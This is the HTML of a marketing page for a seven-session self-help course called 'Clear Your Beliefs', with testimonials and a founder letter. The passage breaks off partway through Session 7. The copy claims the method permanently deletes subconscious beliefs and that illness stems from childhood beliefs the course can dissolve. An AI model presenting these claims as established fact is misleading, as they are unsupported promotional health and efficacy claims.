alt="brain-tree" width="150" height="150" /></a> </span>When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\r\n<p style="text-align: left;">The same thing is true in your subconscious mind:</p>\r\n<span style="color: #333399;"><strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong></span>\r\n<p style="text-align: left;"><strong>It''s that simple.</strong></p>\r\n&nbsp;\r\n<h1>Beliefs Reside In The Subconscious Mind</h1>\r\n<p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\r\n<p style="text-align: left;">To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\r\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong>\r\n\r\n<img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\r\n<strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.\r\n\r\n<em><strong>How you view others </strong></em>is colored by your beliefs about them.\r\n\r\n<strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.\r\n\r\n<img class=" wp-image-322 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" />Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong>\r\n\r\n<strong> <span style="color: #000080;">It’s that simple.</span></strong>\r\n\r\n&nbsp;\r\n<h1>Why Beliefs Are Difficult To Change</h1>\r\nMany people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.\r\n\r\n<strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.\r\n\r\nYour parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.\r\n\r\nYou formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."\r\n\r\n&nbsp;\r\n<h1>Why We React The Way We Do</h1>\r\nWhen you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:\r\n\r\n<img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" />\r\n<ul class="indented-img-left">\r\n	<li>Why did I say that?</li>\r\n	<li>What’s wrong with me?</li>\r\n	<li>Why didn’t I follow through?</li>\r\n	<li>Why did I react that way?</li>\r\n	<li>What the hell just happened?</li>\r\n</ul>\r\n<em>\r\n"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.\r\n\r\nThese programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.\r\n\r\n<strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong>\r\n\r\n&nbsp;\r\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\r\n<strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. <strong>Here''s why:</strong>\r\n<ul class="indented">\r\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\r\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\r\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\r\n</ul>\r\nMost belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong>\r\n\r\n&nbsp;\r\n<h1>Here’s Some Good News</h1>\r\n<ul class="indented">\r\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It’s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\r\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\r\n</ul>\r\nTo get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.\r\n\r\nYou can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.\r\n\r\n&nbsp;\r\n<h1>Imagine The Life You Desire</h1>\r\n<strong>Can you imagine this?</strong>\r\n\r\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\r\n<ul class="indented-img-left">\r\n	<li>You''re no longer held back by old beliefs and stories.</li>\r\n	<li>There''s no resistance to doing what needs to be done.</li>\r\n	<li>You feel joy and positive energy as you move forward to create the life of your dreams.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\r\n<strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong>\r\n\r\n<img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em>\r\n\r\nThose discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.\r\n\r\n<em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong>\r\n\r\n&nbsp;\r\n<h1>Clear Whatever Is In The Way</h1>\r\n<img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.\r\n\r\n<strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> want.</strong>\r\n\r\n&nbsp;\r\n<h1>Is This A Guaranteed Cure-All For What Ails You?</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work. No technique will cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. No free rides.\r\n\r\nIn our ten years of experience using this technique with thousands of clients, we''ve seen that nearly every problem has its source at the causal causal level, down where your beliefs are stored. Itt takes significant effort to clear your deepest beliefs – the ones that got programmed before you could speak.\r\n\r\nThat''s why we offer a <strong>Coaching Option</strong> with our program. Our professionally trained <em>Clear Your Beliefs Coaches</em> can guide you on your journey down to the deepest level of your psyche – a place that''s difficult to get to all by yourself.\r\n\r\n&nbsp;\r\n<h1>The Clear Your Beliefs program can:</h1>\r\n<ul class="indented">\r\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\r\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\r\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\r\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, we invite all aspects of you – mental, emotional, physical, and spiritual – to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.\r\n\r\nIf you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em>\r\n\r\nDuring each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.\r\n<div class="icon_box">\r\n<h1>With This Methodology, You Can Finally:</h1>\r\n<ul class="check">\r\n	<li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="margin-right: -120px ! important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\r\n	<li>Remove resistance and barriers</li>\r\n	<li>Open doors to new opportunities</li>\r\n	<li>Eliminate pain and suffering from the past</li>\r\n	<li>Experience more fulfillment in your relationships</li>\r\n	<li>Attract more abundance and prosperity</li>\r\n	<li>Increase your energy, vitality, and productivity</li>\r\n</ul>\r\n</div>\r\n<strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).\r\n<div class="quot">\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em>\r\n<div style="text-align: right;"><strong>– G. J., software developer</strong></div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n</div>\r\n<div class="message_box">\r\n<h1>A Message from Lion Goodman...</h1>\r\nDear Explorer:\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>As a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.\r\n\r\nI was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"\r\n\r\nI began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)\r\n\r\nAfter decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.\r\n\r\nI noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my way.\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.\r\n\r\nThe belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.\r\n\r\nWhen your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!\r\n\r\n<em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong>\r\n\r\nHaving worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.\r\n\r\nI am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.\r\n\r\nIf you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.\r\n\r\nA lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.\r\n\r\nIn the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. You also have the opportunity to work with a professional <em>Clear Your Beliefs Coach </em>in private sessions. Join me for seven sessions of deep healing and transformation. Clear your old beliefs, and create the life you want.\r\n\r\nThis is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.\r\n\r\nLive the life of your dreams. There’s nothing to stop you – except a few old beliefs... In gratitude, and with warm wishes for your total success,\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\r\n\r\nLion Goodman, Creator of <em>The BeliefCloset Process</em>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Register Today and Discover What''s Possible</h1>\r\nWe are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful technique used by hundreds of coaches and therapists around the world.\r\n\r\nYou can take yourself through the course, or you can go deeper by working one-on-one with a <em>Clear Your Beliefs Coach, </em>who will guide you and answer your questions each week. Our professionally trained coaches are located in cities around the world, and they can work with you in person, by phone, or via Skype.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 1: </span> <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.In this first session, you’ll examine your old beliefs, and determine which ones no longer serve you. It’s time to discard them and clear some space!You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades. You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 1, you will:</strong>\r\n<ul>\r\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\r\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\r\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\r\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em>\r\n<div style="text-align: right;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 2: </span> <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.What do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child. What messages did your parents, caregivers, and siblings plant in your child brain that still affect you?In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.It’s time to haul them out, and toss them out! You don’t need them anymore. If you hear critical inner voices berating you, don’t miss this session. Rid yourself of those pesky critical voices along with the diapers!\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 2, you will:</strong>\r\n<ul>\r\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\r\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\r\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em>\r\n<div style="text-align: right;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div style="text-align: right;"></div>\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 3: </span> <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\r\n\r\nThis isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.<em>What are you capable of? </em> If your answer is “Anything...” you don’t need this session. But most of us think too small...\r\n\r\n</div>\r\n<div class="module_body">Our <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised. We let our negative beliefs stop us.You may hear internal voices say, <em>“What’s the use? You’ll fail anyway. You don’t deserve happiness. Look at you!” </em>We were shamed into thinking that we were less than others. We learned to compare ourselves to others – and we always lose that contest. Clear out any apparent limitations you''ve taken on, and find your true power to create what you want. Do whatever you need to do in order to achieve your vision.</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 3, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\r\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you’re partway there.</li>\r\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em>\r\n<div style="text-align: right;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 4: </span> <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships.If you’re married, are you happy and secure? Or are you anxious about the future? If you’re not in a relationship, what’s holding you back from finding your ideal mate?Humans are social creatures – we must relate to others to survive. At our core, we want a security and safety, but we also want passion and romance. You learned “what love is” from your parents – so it’s no wonder that you’re confused! Most of us repeat patterns we learned from our early childhood. We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like. Love was contaminated by disdain, contempt, withdrawal, or abuse. We were programmed to repeat their patterns – without conscious choice. This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\r\n\r\n</div>\r\n&nbsp;\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 4, you will:</strong>\r\n<ul>\r\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\r\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\r\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em>\r\n<div style="text-align: right;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 5: </span> <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!\r\n\r\nWhat do you believe about earning a living in today’s economy? Is money really the root of all evil?\r\n\r\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem. Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture. Can you see their influence?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 5, you will:</strong>\r\n<ul>\r\n	<li>Examine your family and cultural beliefs about money, work, poverty and “deservingness.”</li>\r\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\r\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\r\n	<li>Learn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em>\r\n<div style="text-align: right;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 6: </span> <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.Ill health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.What do you believe and perceive about your body? Your health? Your age? Your vitality? Your ability to heal? The future of your health?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 6, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and vibrant health</li>\r\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\r\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\r\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em>\r\n<div style="text-align: right;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 7: </span> <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" 